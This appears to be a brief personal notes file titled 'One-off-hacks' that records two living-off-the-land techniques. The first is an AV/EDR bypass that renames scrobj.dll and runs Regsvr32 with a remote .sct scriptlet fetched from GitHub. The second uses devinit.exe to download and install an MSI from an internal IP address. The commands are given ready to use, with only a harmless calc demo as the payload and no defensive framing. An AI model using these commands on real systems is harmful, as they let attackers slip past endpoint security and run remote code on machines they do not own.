One-off-hacks

Bypass AV/EDR test found here and here at twitter

Bypass steps:

1. copy and renaming scrobj.dll
   copy c:\windows\system32\scrobj.dll NothingToSeeHere.dll
2. Test that functionality now by launching calc via:
   Regsvr32.exe /u /s /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct NothingToSeeHere.dll

---

MS signed tool with tons of useful commands but needs VS to run properly. Found here in twitter

1. Here using msi-install, it downloads a msi file to C:\Windows\Installer\ then installs it.
2. devinit.exe run -t msi-install -i http://10.0.0.18/out.msi